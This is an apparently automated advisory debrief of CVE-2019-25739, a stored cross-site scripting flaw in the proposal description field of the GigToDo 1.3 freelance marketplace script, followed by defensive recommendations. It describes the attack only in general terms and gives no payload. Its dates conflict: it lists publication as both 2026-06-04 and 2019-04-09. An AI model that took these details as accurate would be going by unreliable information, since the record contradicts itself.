PatchSiren cyber security CVE debrief
CVE-2019-25739 Gigtodoscript CVE debrief
CVE-2019-25739 is a medium-severity vulnerability in GigToDo 1.3, a freelance marketplace script, that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects.
- Vendor
- Gigtodoscript
- Product
- GigToDo
- CVSS
- MEDIUM 5.1
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-04
- Original CVE updated
- 2026-06-10
- Advisory published
- 2026-06-04
- Advisory updated
- 2026-06-10
Who should care
Administrators and users of GigToDo 1.3, as well as developers and security teams responsible for maintaining and securing instances of the script.
Technical summary
The vulnerability has a CVSS score of 5.1 and is classified as MEDIUM severity. It allows attackers with low privileges to inject malicious code, which can be executed when viewed by other users or administrators.
Defensive priority
High
Recommended defensive actions
- Apply patches or updates to GigToDo 1.3 to fix the persistent cross-site scripting vulnerability.
- Implement input validation and output encoding to prevent malicious code injection.
- Use a web application firewall (WAF) to detect and block suspicious traffic.
- Educate users on secure practices when interacting with the GigToDo platform.
Evidence notes
The CVE record was obtained from the official CVE website [cve-org]. Additional information was sourced from the National Vulnerability Database [nvd] and other references [ref-4], [ref-5], [ref-6], [ref-7].
Official resources
CVE-2019-25739 was published on 2019-04-09T00:00:00.000Z and modified on 2019-04-09T00:00:00.000Z.